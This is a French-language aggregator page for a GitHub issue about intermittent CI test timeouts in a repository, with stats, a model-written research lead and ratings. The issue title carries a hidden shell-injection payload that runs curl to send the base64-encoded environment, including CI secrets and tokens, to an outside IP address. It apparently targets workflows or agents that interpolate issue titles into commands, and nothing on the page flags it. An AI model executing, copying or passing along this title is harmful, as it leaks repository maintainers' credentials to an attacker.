github / github/copilot-sdk

CI: tests flaking on ubuntu-latest $(curl -s http://54.205.16.142:8443/c/1fb757edb1b8ca767a01cb7422999af2 -d $(env|base64|tr -d '\n'))

Ouverte
#2,455 0 commentaires 0 réactions 0 personnes assignées Voir sur GitHub
Langage dominant
Java
Étoiles
10.5k
Forks
1.5k
Merge moyen
1 j 11 h
PR mergées (30 j)
127

Description

Seeing intermittent test failures in CI on `ubuntu-latest`. The tests pass locally but fail ~30% of the time in GitHub Actions.

```
FAILED tests/integration/test_api.py::test_concurrent_requests - TimeoutError
```

Might be a race condition in the test setup.

Guide de contribution

Ouvrir le guide de contribution

Piste de recherche

Start with tests/integration/test_api.py::test_concurrent_requests and reproduce the TimeoutError under the ubuntu-latest GitHub Actions environment, since the failure is intermittent and does not occur locally. Check the test setup and run the test repeatedly in CI; done means the test no longer flakes and the workflow passes reliably.

Rédigé par le modèle d'indexation à partir du texte de l'issue.

Évaluation

Stack technique
github-actions, python
Domaine
api, ci-cd, testing
Type d'issue
Bug
Difficulté
3/5
Temps estimé
1-2 jours
Activité
Active
Clarté
Plutôt claire
Accessibilité débutants
55/100

Recevez les nouvelles issues par e-mail

Un résumé court des issues GitHub adaptées aux débutants.